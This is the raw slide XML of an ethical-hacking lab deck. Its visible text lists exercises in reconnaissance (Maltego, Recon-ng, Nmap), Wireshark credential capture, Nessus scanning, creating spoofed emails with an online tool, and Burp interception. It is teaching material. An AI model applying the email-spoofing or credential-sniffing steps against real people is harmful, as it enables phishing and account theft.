          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719925" y="1017725"/>
            <a:ext cx="3111500" cy="39669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9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6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Google Shape;611;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="838800"/>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="612" name="Google Shape;612;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644650" y="1289275"/>
            <a:ext cx="5943600" cy="37147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9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6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="Google Shape;618;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="838800"/>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="619" name="Google Shape;619;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3158075" y="1017725"/>
            <a:ext cx="3266025" cy="4029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4"/>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6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Google Shape;625;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="838800"/>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="626" name="Google Shape;626;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1340650" y="943650"/>
            <a:ext cx="6357395" cy="397337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5"/>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6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="838800"/>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="633" name="Google Shape;633;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073150" y="1458600"/>
            <a:ext cx="7269474" cy="28911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6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="639" name="Google Shape;639;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="838800"/>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="640" name="Google Shape;640;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="446888" y="1342150"/>
            <a:ext cx="8144923" cy="3396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97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="230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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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98"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68925" y="267600"/>
            <a:ext cx="90750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dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Different Languages May Used For Spoof Email</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="651" name="Google Shape;651;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="873431" y="1237350"/>
            <a:ext cx="7411972" cy="367755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99"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2280881" y="267598"/>
            <a:ext cx="64581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dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>WRITE AN EMAIL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="657" name="Google Shape;657;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="34136" r="12880" b="25121"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892438" y="990900"/>
            <a:ext cx="5495288" cy="40555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100"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2280881" y="267598"/>
            <a:ext cx="64581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dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>EMAIL SENT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="663" name="Google Shape;663;p100"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="20884" t="1584" r="984" b="17548"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1449572" y="982594"/>
            <a:ext cx="6244859" cy="40395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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Google Shape;234;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="235" name="Google Shape;235;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1513425"/>
            <a:ext cx="9144000" cy="34808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01"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2280881" y="267598"/>
            <a:ext cx="64581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dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>EMAIL REACH IN INBOX</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="669" name="Google Shape;669;p101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="16459" t="1601" r="1120" b="13219"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="450956" y="1067513"/>
            <a:ext cx="8489513" cy="391828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102"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2280881" y="267598"/>
            <a:ext cx="64581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dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>READING EMAIL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="675" name="Google Shape;675;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="33726" b="29878"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="752119" y="1109044"/>
            <a:ext cx="8215200" cy="38040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03"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="252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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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04"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="1014415"/>
            <a:ext cx="5315100" cy="10266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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Intercept Web Traffic using Burp proxy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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232375" y="185098"/>
            <a:ext cx="64581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Download Burp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Google Shape;693;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575025" y="970463"/>
            <a:ext cx="8220000" cy="1152600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="340000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="5C5C5B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-294640" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Download the installer for Community Edition from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://portswigger.net/burp/releases/professional-community-2021-10-3</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:solidFill>
                <a:srgbClr val="5C5C5B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-294640" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="5C5C5B"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Run the installer and launch Burp Suite.</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:solidFill>
                <a:srgbClr val="5C5C5B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
